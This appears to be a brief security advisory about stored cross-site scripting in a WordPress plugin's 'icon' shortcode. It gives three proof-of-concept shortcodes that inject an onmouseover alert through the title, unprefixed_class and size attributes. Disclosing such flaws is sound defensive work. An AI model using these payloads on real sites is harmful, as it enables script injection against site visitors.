The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
[icon name='flag' class='4x border' title='" onmouseover="alert(/XSS/)']
[icon name='flag' unprefixed_class='" onmouseover="alert(/XSS/)//']
[icon name='flag' size='" onmouseover="alert(/XSS/)//']